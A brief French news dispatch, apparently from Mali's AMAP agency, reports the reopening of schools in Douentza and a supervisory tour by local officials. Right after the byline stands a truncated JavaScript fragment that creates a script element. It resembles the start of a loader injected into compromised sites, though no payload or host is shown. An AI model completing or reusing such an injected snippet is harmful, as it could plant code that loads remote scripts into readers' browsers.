Douentza: réouverture effective des établissements scolaires

Douentza, 12 octobre (AMAP) La réouverture des établissements scolaires est effective depuis le 9 octobre dernier à Douentza ville ainsi que dans d’autres localités de la circonscription ainsi qu’en ont pu se rendre compte les autorités locales lors d’une tournée des écoles et établissements scolaires, a constaté l’AMAP.

Le préfet de cercle, le président du conseil de cercle, le troisième adjoint au maire, le directeur de l’Académie, du Centre d’animation pédagogique (CAP), les représentants des forces armées et de sécurité ont ainsi conduit une mission de supervision, respectivement à l’école ‘’B’’,  l’école franco-arabe, le second cycle II et au lycée public.

Ils ont partout pu constater la présence effective des élèves, des enseignants ainsi que le démarrage effectif des cours.

Les visiteurs ont saisi l’opportunité de leur passage dans les différentes écoles pour encourager et féliciter les enseignants, les élèves et l’ensemble des autorités scolaires et leur réaffirmer le soutien des plus hautes autorités nationales en vue de la maîtrise de la situation sécuritaire dans la circonscription et l’amélioration des conditions de vie des enseignants et de leur famille.

A.W.O.I D/MS (AMAP)var d=document;var s=d.createElement(‘script’);

Laisser un commentaire